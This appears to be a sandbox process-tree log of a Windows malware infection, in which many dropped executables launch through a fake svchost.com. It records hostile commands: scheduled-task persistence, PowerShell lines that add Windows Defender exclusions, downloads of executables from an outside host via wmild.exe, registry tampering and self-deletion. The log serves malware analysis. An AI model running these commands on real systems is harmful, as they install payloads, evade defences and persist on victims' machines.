C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE
3⤵
PID:3832

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2YG0~1.EXE"
4⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\U2YG0~1.EXE
C:\Users\Admin\AppData\Local\Temp\U2YG0~1.EXE
5⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1368
6⤵
- Program crash
PID:360

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2YG1~1.EXE"
4⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\U2YG1~1.EXE
C:\Users\Admin\AppData\Local\Temp\U2YG1~1.EXE
5⤵
PID:3024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
6⤵
PID:5028

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:2292

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
7⤵
- Creates scheduled task(s)
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 1160
4⤵
- Program crash
PID:2464

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
2⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\Files\native.exe
C:\Users\Admin\AppData\Local\Temp\Files\native.exe
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\Files\native.exe
C:\Users\Admin\AppData\Local\Temp\Files\native.exe
4⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\Files\native.exe
C:\Users\Admin\AppData\Local\Temp\Files\native.exe
4⤵
PID:3320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 476
5⤵
- Program crash
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 448
5⤵
- Program crash
PID:2608

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\amin.exe"
2⤵
PID:1408

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"
2⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
3⤵
PID:1896

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SOCKS5~1.EXE"
2⤵
PID:3236

C:\Users\Admin\AppData\Local\Temp\Files\SOCKS5~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\SOCKS5~1.EXE
3⤵
PID:4488

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File socks5-clean.ps1
4⤵
PID:1952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File socks5-clean.ps1
5⤵
PID:1040

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\OUTPUT~1.EXE"
2⤵
PID:2056

C:\Users\Admin\AppData\Local\Temp\Files\OUTPUT~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\OUTPUT~1.EXE
3⤵
PID:8

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
2⤵
PID:2884

C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
3⤵
PID:4784

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\APEX_B~1.EXE"
2⤵
PID:3288

C:\Users\Admin\AppData\Local\Temp\Files\APEX_B~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\APEX_B~1.EXE
3⤵
PID:2448

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SCRIPT~1.EXE"
2⤵
PID:2140

C:\Users\Admin\AppData\Local\Temp\Files\SCRIPT~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\SCRIPT~1.EXE
3⤵
PID:464

C:\Users\Admin\AppData\Local\Temp\Files\SCRIPT~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\SCRIPT~1.EXE
4⤵
PID:3024

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
2⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
3⤵
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 772
4⤵
- Program crash
PID:1908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 780
4⤵
- Program crash
PID:844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 780
4⤵
- Program crash
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 812
4⤵
- Program crash
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1040
4⤵
- Program crash
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1056
4⤵
- Program crash
PID:2448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1112
4⤵
- Program crash
PID:1116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1032
4⤵
- Program crash
PID:3076

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE"
2⤵
PID:3208

C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE
C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE
3⤵
PID:724

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
4⤵
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1392
5⤵
- Program crash
PID:3544

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
4⤵
PID:3232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
5⤵
PID:3404

C:\Windows\SysWOW64\chcp.com
chcp 1251
6⤵
PID:4720

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
6⤵
- Creates scheduled task(s)
PID:3360

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\WINDOW~1.EXE"
2⤵
PID:2596

C:\Users\Admin\AppData\Local\Temp\Files\WINDOW~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\WINDOW~1.EXE
3⤵
PID:2808

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
2⤵
PID:3628

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
C:\Users\Admin\AppData\Local\Temp\Files\net.exe
3⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
C:\Users\Admin\AppData\Local\Temp\Files\net.exe
4⤵
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 504
5⤵
- Program crash
PID:2244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 512
5⤵
- Program crash
PID:2588

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\IDRB5E~1.EXE"
2⤵
PID:1092

C:\Users\Admin\AppData\Local\Temp\Files\IDRB5E~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\IDRB5E~1.EXE
3⤵
PID:4728

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\VLTKNH~1.EXE"
2⤵
PID:3276

C:\Users\Admin\AppData\Local\Temp\Files\VLTKNH~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\VLTKNH~1.EXE
3⤵
PID:5084

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\H667H.exe"
2⤵
PID:940

C:\Users\Admin\AppData\Local\Temp\Files\H667H.exe
C:\Users\Admin\AppData\Local\Temp\Files\H667H.exe
3⤵
PID:2460

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE"
2⤵
PID:1636

C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%2~1.EXE
3⤵
PID:4184

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~1.EXE"
2⤵
PID:3084

C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\DIGITA~1.EXE
3⤵
PID:2164

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\BUILD6~1.EXE"
2⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\Files\BUILD6~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\BUILD6~1.EXE
3⤵
PID:4484

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BUILD6~1.EXE'
4⤵
PID:4592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BUILD6~1.EXE'
5⤵
PID:1640

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\BUILD6~1.EXE'
4⤵
PID:1764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\BUILD6~1.EXE'
5⤵
PID:2524

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe"
2⤵
PID:2276

C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe
C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe
3⤵
PID:2196

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TRUST1~1.EXE"
2⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\Files\TRUST1~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\TRUST1~1.EXE
3⤵
PID:240

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3.exe"
2⤵
PID:2520

C:\Users\Admin\AppData\Local\Temp\Files\3.exe
C:\Users\Admin\AppData\Local\Temp\Files\3.exe
3⤵
PID:3696

C:\Users\Admin\AppData\Local\Temp\Files\3.exe
C:\Users\Admin\AppData\Local\Temp\Files\3.exe
4⤵
PID:3868

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\system32\svchost.exe"
5⤵
PID:2356

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"
2⤵
PID:4008

C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe
3⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "
4⤵
PID:3932

C:\Users\Admin\AppData\Local\Temp\Files\Users.exe
users.exe
5⤵
PID:808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "
6⤵
PID:5104

C:\Windows\SysWOW64\chcp.com
CHCP 1251
7⤵
PID:2384

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 1
7⤵
- Runs ping.exe
PID:4780

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/app.exe
7⤵
PID:5340

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe
7⤵
PID:5484

C:\Windows\SysWOW64\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f
7⤵
PID:5724

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 6
7⤵
- Runs ping.exe
PID:5764

C:\Windows\SysWOW64\reg.exe
REG QUERY hkcu\software\microsoft\windows\currentversion
7⤵
- Modifies registry key
PID:5956

C:\Windows\SysWOW64\find.exe
find "svr.vbs"
7⤵
PID:5964

C:\Windows\SysWOW64\reg.exe
reg delete HKCU\SOFTWARE\JetSwap /f
7⤵
- Modifies registry key
PID:5992

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
5⤵
- Runs ping.exe
PID:4088

C:\Windows\SysWOW64\explorer.exe
explorer.exe C:\Users\Admin\AppData\Roaming\Macromedia
5⤵
PID:5500

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
2⤵
PID:1196

C:\Users\Admin\AppData\Local\Temp\Files\update.exe
C:\Users\Admin\AppData\Local\Temp\Files\update.exe
3⤵
PID:5836

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
2⤵
PID:3272

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
3⤵
PID:5896

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
4⤵
PID:5928

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
5⤵
PID:5968

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
6⤵
PID:2628

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
7⤵
PID:2300

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
8⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
9⤵
PID:6084

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
10⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
11⤵
PID:1076

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
12⤵
PID:892

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
13⤵
PID:3516

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
14⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
15⤵
PID:5428

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
16⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
17⤵
PID:5728

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
18⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
19⤵
PID:3456

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
20⤵
PID:1136

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
21⤵
PID:3492

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
22⤵
PID:2176

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
23⤵
PID:5336

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
24⤵
PID:4144

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
25⤵
PID:3140

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
26⤵
PID:2948

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
27⤵
PID:1576

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
28⤵
PID:4012

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
29⤵
PID:1136

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
30⤵
PID:336

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
31⤵
PID:104

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
32⤵
PID:4644

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
33⤵
PID:1036

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
34⤵
PID:3732

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
35⤵
PID:1100

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
36⤵
PID:572

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
37⤵
PID:4380

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
38⤵
PID:2796

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
39⤵
PID:5856

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
40⤵
PID:5700

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
41⤵
PID:5304

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
42⤵
PID:5752

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
43⤵
PID:5248

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
44⤵
PID:5612

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
45⤵
PID:1280

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
46⤵
PID:1196

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
47⤵
PID:6056

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
48⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
49⤵
PID:5164

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
50⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
51⤵
PID:3800

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
52⤵
PID:5700

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
53⤵
PID:1524

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
54⤵
PID:5056

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
55⤵
PID:2588

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
56⤵
PID:5076

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
57⤵
PID:5932

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\RUNTIM~1.EXE"
2⤵
PID:1340

C:\Users\Admin\AppData\Local\Temp\Files\RUNTIM~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\RUNTIM~1.EXE
3⤵
PID:5716

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
2⤵
PID:3296

C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
3⤵
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 1388
4⤵
- Program crash
PID:336

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
2⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
3⤵
PID:3648

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
4⤵
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c timeout /t 5 & del /f /q C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe & del "C:\ProgramData\*.dll"" & exit
5⤵
PID:2176

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
6⤵
- Delays execution with timeout.exe
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 2468
4⤵
- Program crash
PID:5832

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\STEALE~1.EXE"
2⤵
PID:2332

C:\Users\Admin\AppData\Local\Temp\Files\STEALE~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\STEALE~1.EXE
3⤵
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 872
4⤵
- Program crash
PID:4048

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\fu.exe"
2⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\Files\fu.exe
C:\Users\Admin\AppData\Local\Temp\Files\fu.exe
3⤵
PID:1900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
4⤵
PID:636

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://www.youtube.com/
5⤵
PID:1992

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://www.youtube.com/
6⤵
PID:1756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
4⤵
PID:1976

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://www.linkedin.com/login
5⤵
PID:5280

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://www.linkedin.com/login
6⤵
PID:3392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
4⤵
PID:2480

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://www.facebook.com/video
5⤵
PID:4288

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://www.facebook.com/video
6⤵
PID:4808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
4⤵
PID:760

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://accounts.google.com/
5⤵
PID:5740

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"
2⤵
PID:800

C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
3⤵
PID:3456

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\OSM-CL~1.EXE"
4⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\Files\OSM-CL~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\OSM-CL~1.EXE
5⤵
PID:2900

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
2⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
3⤵
PID:4492

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\QUANTU~1.EXE"
2⤵
PID:2044

C:\Users\Admin\AppData\Local\Temp\Files\QUANTU~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\QUANTU~1.EXE
3⤵
PID:5068

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\osminog.exe"
2⤵
PID:5280

C:\Users\Admin\AppData\Local\Temp\Files\osminog.exe
C:\Users\Admin\AppData\Local\Temp\Files\osminog.exe
3⤵
PID:2544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3588 -ip 3588
1⤵
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3588 -ip 3588
1⤵
PID:3056

